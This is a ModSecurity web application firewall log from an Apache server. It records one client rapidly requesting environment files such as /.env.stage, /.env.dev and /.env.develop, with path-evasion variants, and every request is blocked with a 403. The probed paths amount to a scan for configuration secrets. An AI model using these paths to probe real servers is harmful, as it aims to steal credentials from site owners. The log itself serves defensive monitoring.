[Fri Jan 16 03:13:58.600530 2026] [:error] [pid 1444032] [client 45.148.10.246:46958] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aWme5ukMvq8uPO2ZciWofwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.stage
[Fri Jan 16 03:13:58.600702 2026] [:error] [pid 1444032] [client 45.148.10.246:46958] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aWme5ukMvq8uPO2ZciWofwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.stage
[Fri Jan 16 03:13:58.829507 2026] [:error] [pid 1444226] [client 45.148.10.246:46966] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage/"] [unique_id "aWme5mcpoCUgeFICb0bc0QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.stage/
[Fri Jan 16 03:13:58.829729 2026] [:error] [pid 1444226] [client 45.148.10.246:46966] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage/"] [unique_id "aWme5mcpoCUgeFICb0bc0QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.stage/
[Fri Jan 16 03:13:58.829887 2026] [:error] [pid 1444226] [client 45.148.10.246:46966] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage/"] [unique_id "aWme5mcpoCUgeFICb0bc0QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.stage/
[Fri Jan 16 03:13:59.078027 2026] [:error] [pid 1444040] [client 45.148.10.246:46982] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aWme5_n_5sIyKhJ5GAzXqQAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.stage
[Fri Jan 16 03:13:59.078272 2026] [:error] [pid 1444040] [client 45.148.10.246:46982] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aWme5_n_5sIyKhJ5GAzXqQAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.stage
[Fri Jan 16 03:13:59.078459 2026] [:error] [pid 1444040] [client 45.148.10.246:46982] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aWme5_n_5sIyKhJ5GAzXqQAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.stage
[Fri Jan 16 03:13:59.245772 2026] [:error] [pid 1444031] [client 45.148.10.246:46988] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aWme53-9MmrgwjmYTAJQZAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.stage
[Fri Jan 16 03:13:59.245998 2026] [:error] [pid 1444031] [client 45.148.10.246:46988] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aWme53-9MmrgwjmYTAJQZAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.stage
[Fri Jan 16 03:13:59.246146 2026] [:error] [pid 1444031] [client 45.148.10.246:46988] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aWme53-9MmrgwjmYTAJQZAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.stage
[Fri Jan 16 03:13:59.393947 2026] [:error] [pid 1444033] [client 45.148.10.246:36270] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWme59LJkp65ULFQ2YYgjgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.development
[Fri Jan 16 03:13:59.394166 2026] [:error] [pid 1444033] [client 45.148.10.246:36270] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWme59LJkp65ULFQ2YYgjgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.development
[Fri Jan 16 03:13:59.394321 2026] [:error] [pid 1444033] [client 45.148.10.246:36270] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWme59LJkp65ULFQ2YYgjgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.development
[Fri Jan 16 03:13:59.724952 2026] [:error] [pid 1444034] [client 45.148.10.246:36284] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWme5-RfEYyDES-ZFL4ggQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.development
[Fri Jan 16 03:13:59.725168 2026] [:error] [pid 1444034] [client 45.148.10.246:36284] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWme5-RfEYyDES-ZFL4ggQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.development
[Fri Jan 16 03:13:59.725318 2026] [:error] [pid 1444034] [client 45.148.10.246:36284] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWme5-RfEYyDES-ZFL4ggQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.development
[Fri Jan 16 03:13:59.869996 2026] [:error] [pid 1444032] [client 45.148.10.246:36288] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWme5-kMvq8uPO2ZciWogAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.development
[Fri Jan 16 03:13:59.870218 2026] [:error] [pid 1444032] [client 45.148.10.246:36288] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWme5-kMvq8uPO2ZciWogAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.development
[Fri Jan 16 03:13:59.870438 2026] [:error] [pid 1444032] [client 45.148.10.246:36288] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWme5-kMvq8uPO2ZciWogAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.development
[Fri Jan 16 03:14:00.466373 2026] [:error] [pid 1444031] [client 45.148.10.246:36314] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aWme6H-9MmrgwjmYTAJQZQAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//.env.dev
[Fri Jan 16 03:14:00.466617 2026] [:error] [pid 1444031] [client 45.148.10.246:36314] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aWme6H-9MmrgwjmYTAJQZQAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//.env.dev
[Fri Jan 16 03:14:00.466811 2026] [:error] [pid 1444031] [client 45.148.10.246:36314] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aWme6H-9MmrgwjmYTAJQZQAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//.env.dev
[Fri Jan 16 03:14:00.659780 2026] [:error] [pid 1444033] [client 45.148.10.246:36326] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aWme6NLJkp65ULFQ2YYgjwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./.env.dev
[Fri Jan 16 03:14:00.660008 2026] [:error] [pid 1444033] [client 45.148.10.246:36326] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aWme6NLJkp65ULFQ2YYgjwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./.env.dev
[Fri Jan 16 03:14:00.660189 2026] [:error] [pid 1444033] [client 45.148.10.246:36326] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aWme6NLJkp65ULFQ2YYgjwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./.env.dev
[Fri Jan 16 03:14:00.838902 2026] [:error] [pid 1444034] [client 45.148.10.246:36340] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.develop"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.develop"] [unique_id "aWme6ORfEYyDES-ZFL4gggAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.develop
[Fri Jan 16 03:14:00.839124 2026] [:error] [pid 1444034] [client 45.148.10.246:36340] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.develop"] [unique_id "aWme6ORfEYyDES-ZFL4gggAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.develop
[Fri Jan 16 03:14:00.839301 2026] [:error] [pid 1444034] [client 45.148.10.246:36340] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.develop"] [unique_id "aWme6ORfEYyDES-ZFL4gggAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.develop
[Fri Jan 16 03:14:01.055302 2026] [:error] [pid 1444032] [client 45.148.10.246:36350] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.develop/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.develop/"] [unique_id "aWme6ekMvq8uPO2ZciWogQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.develop/
[Fri Jan 16 03:14:01.055527 2026] [:error] [pid 1444032] [client 45.148.10.246:36350] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.develop/"] [unique_id "aWme6ekMvq8uPO2ZciWogQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.develop/
[Fri Jan 16 03:14:01.055705 2026] [:error] [pid 1444032] [client 45.148.10.246:36350] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.develop/"] [unique_id "aWme6ekMvq8uPO2ZciWogQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.develop/
[Fri Jan 16 03:14:01.234175 2026] [:error] [pid 1444226] [client 45.148.10.246:36352] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.develop"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.develop"] [unique_id "aWme6WcpoCUgeFICb0bc0gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.env.develop
[Fri Jan 16 03:14:01.234434 2026] [:error] [pid 1444226] [client 45.148.10.246:36352] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.develop"] [unique_id "aWme6WcpoCUgeFICb0bc0gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.env.develop
[Fri Jan 16 03:14:01.234608 2026] [:error] [pid 1444226] [client 45.148.10.246:36352] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.develop"] [unique_id "aWme6WcpoCUgeFICb0bc0gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.env.develop
[Fri Jan 16 03:14:01.409241 2026] [:error] [pid 1444040] [client 45.148.10.246:36366] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.develop"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.develop"] [unique_id "aWme6fn_5sIyKhJ5GAzXqgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./.env.develop
[Fri Jan 16 03:14:01.409481 2026] [:error] [pid 1444040] [client 45.148.10.246:36366] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.develop"] [unique_id "aWme6fn_5sIyKhJ5GAzXqgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./.env.develop
